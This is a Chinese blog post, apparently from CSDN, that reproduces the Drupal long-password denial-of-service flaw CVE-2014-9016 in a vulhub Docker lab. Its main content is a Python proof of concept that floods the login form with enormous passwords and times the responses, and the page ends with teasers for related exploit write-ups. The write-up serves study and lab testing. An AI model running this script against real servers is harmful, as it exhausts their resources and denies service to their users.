Drupal长密码拒绝服务漏洞复现(CVE-2014-9016),python编写POC

最新推荐文章于 2024-04-22 23:56:52 发布
最新推荐文章于 2024-04-22 23:56:52 发布
阅读量4.1k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: python 安全漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangqiao258/article/details/121013405
版权

环境搭建:

使用vulhub,进入CVE-2014-3704文件夹启动环境:


[root@www /]# cd /home/vulhub-master/drupal/CVE-2014-3704/
[root@www CVE-2014-3704]# docker-compose up -d

查看端口:


[root@www CVE-2014-3704]# docker ps
CONTAINER ID   IMAGE                      COMMAND                  CREATED         STATUS          PORTS                                                                                  NAMES
d51829db19cc   vulhub/drupal:7.31         "docker-php-entrypoi…"   4 minutes ago   Up 11 seconds   0.0.0.0:8080->80/tcp, :::8080->80/tcp                                                  cve-2014-3704_web_1

环境启动后,访问http://your-ip:8080即可看到Drupal的安装页面,使用默认配置安装即可。

其中,Mysql数据库名填写drupal,数据库用户名、密码为root,地址为mysql:

漏洞复现:

正常登录,使用Burp Suite抓包:
在这里插入图片描述

POC编写:

import requests

url = "http://192.168.33.170:8080/?q=node&destination=node"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.33.170:8080/?q=node&destination=node", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.33.170:8080", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

for i in [1,1000,1,5000,1,10000,1,20000,1,30000]:
    passwd = "abcde12345" * i * 10000
    data = {"name": "abc", "pass": f"{passwd}",}
    r = requests.post(url, headers=headers,  data=data,timeout=999)
    print(f"密码长度:{i} 十万")
    print("响应时间:",r.elapsed.total_seconds())
    print("-"*20)
#短密码响应时间证明网络正常

pycharm运行结果:
在这里插入图片描述

基于密码的PHP函数验证漏洞学习(Long Password Denial of Service (DoS))
关注互联网安全的小虾米一枚
11-18 7371
啥都不说,干货直接上源码。 <?php /* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the edito
drupal 执行.php文件,CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
weixin_35408656的博客
04-06 547
作者: 启明星辰ADLab0x01 漏洞描述2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。0x02 漏洞分析通过diff 8.3.3与8.3.4的文件可以发现漏洞的触发点,如下图:可以看到,8.3.4 decode...
[CVE-2022-0778]OpenSSL拒绝服务漏洞分析
whoami
03-16 2416
一、背景 OpenSSL 是一个安全套接字层密码库,囊括主要的密码算法、常用的密钥和证书封装管理功能及SSL协议,并提供丰富的应用程序供测试或其它目的使用。 该漏洞由于计算模平方根的 BN_mod_sqrt() 函数错误导致,该错误可能导致它对于非素数模数无限循环,最终导致拒绝服务。 二、漏洞分析 查看openssl官方最近的一次漏洞修复commit记录: Fix possible infinite loop in BN_mod_sqrt() · openssl/openssl@3118eb6
Web密码拒绝服务漏洞
黑剑
03-09 2318
没有对明文密码度施加任何最大值,这意味着攻击者可以简单地提交任意大且保证失败的密码,迫使运行 服务器执行由此产生的昂贵的哈希计算以尝试检查密码。 例如,在使用 PBKDF2 哈希器时,大小为 1 兆字节的密码将需要大约一分钟的计算时间来检查,“这允许通过重复提交大密码来进行拒绝服务攻击,从而在昂贵的相应哈希计算中占用服务器资源。” 场景一:如果用户名不存在,则不会计算密码哈希,因为用户名不存在。 场景二:如果用户名存在,则计算密码散列并与存储在数据库中的散列进行比较。如果比较的哈希值相同,则授予您访问
php密码格式验证函数,[置顶] 基于密码的PHP函数验证漏洞学习(Long Password Denial of Service (DoS))...
weixin_31690531的博客
03-20 706
啥都不说,干货直接上源码。/** To change this license header, choose License Headers in Project Properties.* To change this template file, choose Tools | Templates* and open the template in the editor.*///demo 0x00...
本地拒绝服务漏洞修复建议
weixin_30409849的博客
03-21 467
1. 阿里聚安全建议将不必要的导出的组件设置为不导出 出于安全考虑,阿里聚安全应将不必要的组件导出,防止引起拒绝服务,尤其是杀毒、安全防护、锁屏防盗等安全应用; 在AndroidMenifest.xml文件中,将相应组件的“android:exported”属性设置为“false”,如下示例: <activity android:name="MyActivity" ...
Drupal漏洞复现CVE-2019-6341
weixin_59086772的博客
12-30 2429
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
Drupal 远程代码执行漏洞复现CVE-2018-7602)
Tauil的博客
08-08 1089
使用parse_str,并存入options,还需要通过其他步骤来触发漏洞。的输入来处理请(GET,POST,COOKIE,REQUEST)中数据。建立vulhub/drupal/CVE-2018-7602/环境。访问http://靶机IP/shell.php即可看到新建的网页。使用以下poc.py,与官网不同的是强制定义命令为。对CVE-2018-7600漏洞的补丁通过过滤带有。会导致输入错误等等原因,所以进行了一点修改。中的URL进行URL编码,当对URL中的。形式的请求,发起请求需要对。...
Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600)
limb0的博客
07-04 7101
Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600) 一、漏洞介绍 2018年3月28日,Drupal官方发布新补丁和安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。 漏洞影响范围: 截止2018年3月29日,还未有公开PoC Drupal 6.x版本 Drupal 7.x版本 Drupal 8.x版本 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环
2024HVV在即| 最新漏洞CVE(1.5W)与历史漏洞POC总结分享!
最新发布
记录开发和安全学习过程中的点点滴滴
04-22 3155
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
拒绝服务攻击原理及解决方法
03-01
Internet给全世界的人们带来了无限的生机,真正实现了无国界的全球村。但是还有很多困绕我们的因素,象IP地址的短缺,大量带宽的损耗,以及政府规章的限制和编程技术的不足。现在,由于多年来网络系统累积下了无数的漏洞,我们将面临着更大的威胁,网络中潜伏的好事者将会以此作为缺口来对系统进行攻击,我们也不得不为以前的疏忽付出更大的努力。虽然大多的网络系统产品都标榜着安全的旗号,但就我们现在的网络协议和残缺的技术来看,危险无处不在。 拒绝服务攻击是一种遍布全球的系统漏洞,黑客们正醉心于对它的研究,而无数的网络用户将成为这种攻击的受害者。Tribe Flood Network, tfn2k, smurf, targa…还有许多的程序都在被不断的开发出来。这些程序想瘟疫一样在网络中散布开来,使得我们的村落更为薄弱,我们不得不找出一套简单易用的安全解决方案来应付黑暗中的攻击
wp_drupal_timing_attack:用于利用 CVE-2014-9016CVE-2014-9034 的 Python 脚本
07-04
wp_drupal_timing_attack 用于利用 CVE-2014-9016CVE-2014-9034 的 Python 脚本。 仅用于合法目的
fastroads-2014
05-24
快速路 Bukkit的FastRoads插件不完整。 很快将被更新的版本取代。
(CVE-2019-6340)Drupal 远程代码执行漏洞
m0_55563900的博客
04-17 645
漏洞概念 Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。 根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出现: RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。 JSON:API服务模块开启,此服务尚未分析。 2.影响版本 Drupal < 8.6.10Dru
Drupal远程代码执行漏洞CVE-2019-6339)
weixin_46411728的博客
08-25 2946
Drupal 远程代码执行漏洞CVE-2019-6339)
Drupal 远程代码执行漏洞CVE-2018-7602)
黑白的博客
12-28 3206
声明 好好学习,天天向上 漏洞描述 4月25日,Drupal官方发布通告,Drupal Core 存在一个远程代码执行漏洞,影响 7.x 和 8.x 版本。据分析,这个漏洞CVE-2018-7600的绕过利用,两个漏洞原理是一样的,通告还称,已经发现了这个漏洞CVE-2018-7600的在野利用 影响范围 Drupal 6.x,7.x,8.x 复现过程 这里使用7.57版本 使用vulhub /app/vulhub-master/drupal/CVE-2018-7602 使用docker启动 dock
CVE-2019-6339 Drupal 远程代码执行漏洞
m0_48520508的博客
01-15 896
0x00简介 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。Drupal是用作建设网站的。它是一个高度模块化,开源的web内容管理框架,它重点建立在合作之上的。它是一个可扩展的,适应标准的,并努力保持简洁代码和较小脚本的系统。Drupal 发布版中包含基本的核心功能,其他的额外功能可通过安装模块来获得。Drupal被设计为可被定制的,但是定制是通过覆写核心功能或者增加模块来完成的,而不是修改核心组件中的代码。它同样成功
漏洞分析】Drupal 远程代码执行(CVE-2017-6920)
蚁景网安学院
07-13 786
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的复现了,于是就想着对这个漏洞进行一个详细的分析......
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值